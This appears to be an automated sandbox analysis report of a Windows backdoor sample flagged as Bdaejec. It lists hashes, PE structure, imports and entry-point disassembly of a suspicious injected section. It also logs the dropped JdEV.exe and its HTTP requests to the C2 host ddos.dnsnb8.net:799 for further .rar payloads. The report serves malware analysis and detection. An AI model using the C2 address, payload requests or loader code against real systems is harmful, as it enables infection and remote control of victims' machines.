SSDEEP:	96:f4rgQY2e/NI0IXSu6o4zvM181fQ1UvZUuQSCUJ:b2e/BfosxZUK/
MD5:	37B7D5A41FF318D021B72C680E68CC3B
SHA1:	69977EC82CFD33B3A06BA4DD06553CE6E8FDD256
SHA-256:	81E03C26AA1707F2019E050037D31F89B80F808CE9F4C5CE804FC43BE1E22355
SHA-512:	F112FF23C1542737CB3A519C862F9A746F7922BD0983B942A03099942D23C8AD219B02A2ACD6F4C2E442E8A23009C0E460238A69DE7331FD1A071FC4E78353C3
Malicious:	false
Preview:	................X........K.}........................h.......p...D.......d... ...h.......................C.:.\.W.i.n.d.o.w.s.............................................................................................................................................................................................................H...........................................8.......................................H.......................................................................................................................................................................................................................................,.......................................................................................................................................................................................................................................................................................................h...............................................8...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422036462537943
Encrypted:	false
SSDEEP:	6144:CSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNy0uhiTw:RvloTMW+EZMM6DFyo03w
MD5:	80B89F8FCF476C2A28F60EE858390297
SHA1:	A410BB54B91DCBAFD6ECCD716C99D6A2EF07BBE3
SHA-256:	84B92EFB5396866E980B218C3C815A344CC091463AAEC4F2E7402C44A9F87FC2
SHA-512:	4C991D31CF6C323492EB4FD1303AEE69CD1210F7551982C66D9CE9099223EC3B134933A0DAB62A3419FD74D50DE92A62D6A0652052DDC03A13BADB608FD51834
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....`..............................................................................................................................................................................................................................................................................................................................................F..)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.426054235926492
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BXOZIGZEUa.exe
File size:	1'700'352 bytes
MD5:	fa07873f37b171a5567a9b4b3f2c65eb
SHA1:	47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
SHA512:	68a8f289ea6acdd7b79595cd8f7cde9ff468f2e26b56e1b7cef024b8a999f834a94e43c165a5a9b0c4b42008afb7b9446b29aa2019c68133d65409d631c19f29
SSDEEP:	49152:XE4XbjEKOh3SbiwJjn7gu5LUvdW9apuLvht/cionurM0EIMa1:Xrj834iwJjn7gu5LmMapuNiiMurM0
TLSH:	96759D3136908077C67B32319B9AA3FDB6F9A5304D35524B56A10E3C2E709D3A92C76F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Nd.s/..s/..s/..zW..r/..zW.../..h..._/..h..../..h.......zW..V/..s/...-..h...q/..h...r/..h...r/..Richs/..........PE..L.....q]...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5a6000
Entrypoint Section:	uY
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5D71F817 [Fri Sep 6 06:09:27 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	6f75980df73bd959bec9fcfb664cfd02

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 5645644Ah
mov dword ptr [ebp-44h], 6578652Eh
mov dword ptr [ebp-40h], 00000000h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FF040E682F5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF58236h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FF040E6843Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FF040E68344h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FF040E6833Bh

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x169250	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17b000	0x6d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17c000	0x1a450	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x128d40	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x152ba0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x128000	0x934	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1268a3	0x126a00	f488be5fc3a676598f8a364845853fad	False	0.5610067750318201	data	6.539294700431528	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x128000	0x444ba	0x44600	e3d187bee7a20b52c8a5aa950dc5959c	False	0.27052745086837293	data	5.047397246056738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x16d000	0xdb04	0x6000	2f590fbdc2c5ab2e1fce65b7a0243ebb	False	0.2849934895833333	data	4.7641816505688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x17b000	0x6d8	0x800	18b01f74d64d681072db0f41366c4eb8	False	0.353515625	data	4.6625627260129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17c000	0x293f4	0x29400	3edbefab711cfe5d831cbd18bbf4c4bd	False	0.26879142992424243	data	4.982795266679088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
uY	0x1a6000	0x5000	0x4200	0cbe2dac05299bb6514c66d11d100775	False	0.7771070075757576	data	6.933836062310107	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_STRING	0x17b0e8	0x3e	data	English	United States	0.6612903225806451
RT_VERSION	0x17b128	0x344	data	Chinese	China	0.4258373205741627
RT_MANIFEST	0x17b46c	0x26a	ASCII text, with very long lines (618), with no line terminators	English	United States	0.43042071197411

Imports

DLL	Import
SETUPAPI.dll	SetupGetStringFieldW, SetupDiDestroyDeviceInfoList, SetupDiCallClassInstaller, SetupDiGetDeviceRegistryPropertyW, SetupDiEnumDeviceInfo, SetupDiGetClassDevsW, SetupFindNextLine, SetupCloseInfFile, SetupFindFirstLineW, SetupOpenInfFileW, SetupUninstallOEMInfW
KERNEL32.dll	IsProcessorFeaturePresent, HeapCreate, FreeEnvironmentStringsW, IsValidCodePage, QueryPerformanceCounter, GetStringTypeW, GetTimeZoneInformation, GetConsoleMode, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, GetDriveTypeW, SetEnvironmentVariableA, CreateFileA, GetConsoleCP, GetLocaleInfoA, LCMapStringW, GetOEMCP, GetACP, GetCPInfo, GetStartupInfoW, GetStdHandle, SetHandleCount, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetFileType, GetProcessHeap, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, CreateThread, ExitThread, HeapReAlloc, RaiseException, ExitProcess, RtlUnwind, HeapAlloc, HeapSetInformation, HeapFree, DecodePointer, EncodePointer, FindResourceExW, GetUserDefaultLCID, VirtualProtect, GetNumberFormatW, SearchPathW, Sleep, GetProfileIntW, GetTickCount, GetFileTime, GetFileSizeEx, GetFileAttributesExW, GetTempPathW, GetTempFileNameW, GetFullPathNameW, GetVolumeInformationW, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileW, lstrcmpiW, FreeResource, GlobalFindAtomW, InitializeCriticalSectionAndSpinCount, lstrlenA, GlobalGetAtomNameW, GetCurrentProcessId, GlobalAddAtomW, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, CompareStringW, GlobalFlags, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, GetVersionExW, lstrcpyW, GetSystemDirectoryW, GetCurrentDirectoryW, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, FindFirstFileW, FindNextFileW, FindClose, GlobalFree, CopyFileW, GlobalSize, GlobalUnlock, FormatMessageW, MulDiv, SetErrorMode, lstrcmpA, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, GetModuleFileNameW, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, ActivateActCtx, LoadLibraryW, DeactivateActCtx, SetLastError, MultiByteToWideChar, GlobalLock, lstrcmpW, GlobalAlloc, GetProcAddress, FreeLibrary, GetLocaleInfoW, LoadLibraryExW, InterlockedExchange, LocalAlloc, LocalFree, SetFileAttributesW, GetFileAttributesW, DeleteFileW, WideCharToMultiByte, lstrlenW, GetLastError, GetWindowsDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleHandleW, GetCommandLineW, GetEnvironmentStringsW
USER32.dll	RegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, GetMenuDefaultItem, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, GetUpdateRect, FrameRect, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageW, CreateMenu, IsMenu, UpdateLayeredWindow, EnableScrollBar, UnionRect, MonitorFromPoint, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, UnpackDDElParam, ReuseDDElParam, LoadImageW, InsertMenuItemW, TranslateAcceleratorW, CopyImage, DestroyIcon, LockWindowUpdate, BringWindowToTop, SetCursorPos, SetRect, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, CopyAcceleratorTableW, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateW, MessageBeep, ReleaseCapture, SetCapture, GetSystemMenu, LoadMenuW, IntersectRect, SetClassLongW, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, CreatePopupMenu, DestroyAcceleratorTable, SetParent, SetWindowRgn, IsZoomed, IsIconic, OffsetRect, IsRectEmpty, DestroyMenu, GetMenuItemInfoW, InflateRect, CharUpperW, ShowWindow, MoveWindow, IsDialogMessageW, CopyIcon, CheckDlgButton, RegisterWindowMessageW, LoadIconW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, IsWindow, SetFocus, GetForegroundWindow, SetActiveWindow, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, GetMessageTime, GetMessagePos, MonitorFromWindow, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, RedrawWindow, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, CallWindowProcW, GetMenu, SetWindowLongW, SetWindowPos, GetWindowTextLengthW, GetWindowThreadProcessId, GetLastActivePopup, PostQuitMessage, PostMessageW, RemoveMenu, GetSubMenu, GetMenuItemCount, IsWindowEnabled, EnableWindow, MessageBoxW, KillTimer, SetTimer, InvalidateRect, UpdateWindow, GetDesktopWindow, RealChildWindowFromPoint, GetWindow, GetDlgCtrlID, GetWindowRect, GetWindowLongW, GetClassNameW, PtInRect, CharUpperBuffW, GetDoubleClickTime, GetIconInfo, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, InvertRect, MapDialogRect, HideCaret, GetNextDlgGroupItem, GetWindowTextW, SetWindowTextW, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, ScreenToClient, GrayStringW, GetWindowRgn, DestroyCursor, DrawIcon, InsertMenuW, GetMenuItemID, AppendMenuW, GetMenuStringW, GetMenuState, ValidateRect, GetCursorPos, PeekMessageW, GetKeyState, SendMessageW, IsWindowVisible, GetActiveWindow, DispatchMessageW, TranslateMessage, GetMessageW, CallNextHookEx, SetWindowsHookExW, CheckMenuItem, EnableMenuItem, ModifyMenuW, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, SetCursor, ShowOwnedPopups, DeleteMenu, CopyRect, SetRectEmpty, GetMonitorInfoW, SystemParametersInfoW, EnumDisplayMonitors, GetSystemMetrics, GetSysColor, SetLayeredWindowAttributes, LoadCursorW, GetClientRect, MapWindowPoints, DefWindowProcW, GetClassInfoW, GetSysColorBrush, UnhookWindowsHookEx, FillRect, TabbedTextOutW, DrawTextW, DrawTextExW
GDI32.dll	GetObjectType, CreateHatchBrush, GetTextExtentPoint32W, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CombineRgn, GetBkColor, GetTextColor, PatBlt, CreateEllipticRgn, Polyline, Ellipse, Polygon, SetRectRgn, DPtoLP, OffsetRgn, GetRgnBox, SetDIBColorTable, RealizePalette, StretchBlt, SetPixel, SelectPalette, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, EnumFontFamiliesExW, GetTextFaceW, SetPixelV, SetViewportOrgEx, SelectObject, Escape, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, CreateCompatibleBitmap, GetObjectW, CreateFontIndirectW, CreatePatternBrush, CreateSolidBrush, CreatePen, GetStockObject, CreateDIBitmap, CreateBitmap, CreateDCW, CopyMetaFileW, Rectangle, GetDeviceCaps, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, DeleteObject, GetTextCharsetInfo, EnumFontFamiliesW, GetTextMetricsW, BitBlt, CreateCompatibleDC, CreateRectRgnIndirect, OffsetViewportOrgEx
MSIMG32.dll	TransparentBlt, AlphaBlend
COMDLG32.dll	GetFileTitleW
WINSPOOL.DRV	OpenPrinterW, DocumentPropertiesW, ClosePrinter
ADVAPI32.dll	RegEnumKeyExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegQueryValueW, RegEnumKeyW
SHELL32.dll	SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, DragFinish, DragQueryFileW, SHAppBarMessage, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetDesktopFolder
COMCTL32.dll	ImageList_GetIconSize
SHLWAPI.dll	PathStripToRootW, PathIsUNCW, PathRemoveFileSpecW, PathFindFileNameW, PathFindExtensionW
ole32.dll	CoInitializeEx, DoDragDrop, CreateStreamOnHGlobal, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CoUninitialize, CoInitialize, CoCreateInstance, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoTaskMemFree, CoCreateGuid
OLEAUT32.dll	SysStringLen, VariantClear, VariantChangeType, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocStringLen, VarBstrFromDate, VariantInit, SysAllocString, SysFreeString
gdiplus.dll	GdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
OLEACC.dll	AccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
IMM32.dll	ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll	PlaySoundW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T06:07:57.948894+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.5	56399	1.1.1.1	53	UDP
2025-01-07T06:07:58.585996+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.5	49704	44.221.84.105	799	TCP
2025-01-07T06:08:02.958493+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.5	49705	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:07:58.212992907 CET	49704	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:07:58.217988968 CET	799	49704	44.221.84.105	192.168.2.5
Jan 7, 2025 06:07:58.218066931 CET	49704	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:07:58.218935966 CET	49704	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:07:58.223764896 CET	799	49704	44.221.84.105	192.168.2.5
Jan 7, 2025 06:07:58.585882902 CET	799	49704	44.221.84.105	192.168.2.5
Jan 7, 2025 06:07:58.585895061 CET	799	49704	44.221.84.105	192.168.2.5
Jan 7, 2025 06:07:58.585995913 CET	49704	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:07:58.593066931 CET	49704	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:07:58.599452972 CET	799	49704	44.221.84.105	192.168.2.5
Jan 7, 2025 06:08:02.567219019 CET	49705	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:08:02.572099924 CET	799	49705	44.221.84.105	192.168.2.5
Jan 7, 2025 06:08:02.572249889 CET	49705	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:08:02.572530985 CET	49705	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:08:02.577372074 CET	799	49705	44.221.84.105	192.168.2.5
Jan 7, 2025 06:08:02.958358049 CET	799	49705	44.221.84.105	192.168.2.5
Jan 7, 2025 06:08:02.958374977 CET	799	49705	44.221.84.105	192.168.2.5
Jan 7, 2025 06:08:02.958492994 CET	49705	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:08:03.213107109 CET	49705	799	192.168.2.5	44.221.84.105
Jan 7, 2025 06:08:03.218053102 CET	799	49705	44.221.84.105	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:07:57.948894024 CET	56399	53	192.168.2.5	1.1.1.1
Jan 7, 2025 06:07:58.129590034 CET	53	56399	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 06:07:57.948894024 CET	192.168.2.5	1.1.1.1	0xe4d2	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 06:07:58.129590034 CET	1.1.1.1	192.168.2.5	0xe4d2	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	44.221.84.105	799	3524	C:\Users\user\AppData\Local\Temp\JdEV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 06:07:58.218935966 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	44.221.84.105	799	3524	C:\Users\user\AppData\Local\Temp\JdEV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 06:08:02.572530985 CET	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	00:07:56
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\BXOZIGZEUa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BXOZIGZEUa.exe"
Imagebase:	0x4d0000
File size:	1'700'352 bytes
MD5 hash:	FA07873F37B171A5567A9B4B3F2C65EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:07:56
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:07:56
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\JdEV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\JdEV.exe
Imagebase:	0xd10000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:08:03
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592
Imagebase:	0xd10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.8%
Total number of Nodes:	1214
Total number of Limit Nodes:	34

Executed Functions

Function 004DE757 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 559
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004DE761

Part of subcall function 004E0431: __EH_prolog3.LIBCMT ref: 004E0438
Part of subcall function 004E0431: GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464

GetDeviceCaps.GDI32(?,00000058), ref: 004DE787
DeleteObject.GDI32(00000000), ref: 004DE7E8
DeleteObject.GDI32(00000000), ref: 004DE805
DeleteObject.GDI32(00000000), ref: 004DE822
DeleteObject.GDI32(00000000), ref: 004DE839
DeleteObject.GDI32(00000000), ref: 004DE856
DeleteObject.GDI32(00000000), ref: 004DE86D
DeleteObject.GDI32(00000000), ref: 004DE884
DeleteObject.GDI32(00000000), ref: 004DE89B
DeleteObject.GDI32(00000000), ref: 004DE8B8
DeleteObject.GDI32(00000000), ref: 004DE8CF
_memset.LIBCMT ref: 004DE8F0
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 004DE900
lstrcpyW.KERNEL32(?,?), ref: 004DE94F
EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 004DE976
lstrcpyW.KERNEL32(?), ref: 004DE986
EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 004DE9A1
lstrcpyW.KERNEL32(?), ref: 004DE9B9
CreateFontIndirectW.GDI32(?), ref: 004DE9C5
CreateFontIndirectW.GDI32(?), ref: 004DEA15
CreateFontIndirectW.GDI32(?), ref: 004DEA5A
CreateFontIndirectW.GDI32(?), ref: 004DEA82
CreateFontIndirectW.GDI32(?), ref: 004DEA9F
GetSystemMetrics.USER32(00000048), ref: 004DEABA
lstrcpyW.KERNEL32(?), ref: 004DEACE
CreateFontIndirectW.GDI32(?), ref: 004DEAD4
GetStockObject.GDI32(00000011), ref: 004DEB02
GetObjectW.GDI32(?,0000005C,?), ref: 004DEB24
lstrcpyW.KERNEL32(?), ref: 004DEB5D
CreateFontIndirectW.GDI32(?), ref: 004DEB67
CreateFontIndirectW.GDI32(?), ref: 004DEB86
GetStockObject.GDI32(00000011), ref: 004DEB9C
GetObjectW.GDI32(?,0000005C,?), ref: 004DEBAD
CreateFontIndirectW.GDI32(?), ref: 004DEBB7
CreateFontIndirectW.GDI32(?), ref: 004DEBDA

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

__EH_prolog3_GS.LIBCMT ref: 004DEC65
GetVersionExW.KERNEL32(?,0000011C), ref: 004DEDBB
KiUserCallbackDispatcher.NTDLL(00001000), ref: 004DEDC6
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004DEE4B
